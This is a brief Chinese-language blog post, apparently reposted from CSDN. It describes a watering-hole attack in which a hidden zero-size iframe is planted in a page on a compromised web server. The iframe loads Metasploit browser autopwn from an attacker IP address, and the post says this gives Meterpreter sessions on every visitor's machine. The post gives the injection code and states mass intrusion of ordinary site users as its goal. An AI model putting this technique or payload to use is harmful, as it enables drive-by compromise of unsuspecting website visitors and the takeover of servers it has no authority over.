转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86632147
本次的渗透主要是找到有漏洞的网站,在有漏洞的网站中嵌入隐藏的iFrame,那么访问这个网站的所有系统都会遭受来自browser autopwn服务器的攻击。我们可以利用iFrame注入实现对网站用户的大规模入侵。
攻击网站的用户
具体实施
首先,我们要获取一个存在漏洞的服务器的控制权限,这一点非常重要
接着,我们在网站的某个页面中,嵌入类似如下的代码:
<iframe src="http://192.168.175.128" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>每当有受害者访问网站时,上面的代码就会自动加载iFrame中的恶意browser autopwn。由于这段代码包含了一个iframe标签,它将会从攻击者系统中自动加载browser autopwn。我们需要保存这个文件,并允许用户对网站的访问。
受害者一旦访问了这个网页,browser autopwn将会自动在受害者的计算机上运行。我们必须确保browser autopwn模块正常运行
如果一切顺利,我们将会获得在目标系统中运行的Meterpreter。这种渗透思路是使用目标网站引诱最大数量的受害者,并进入到他们的系统中。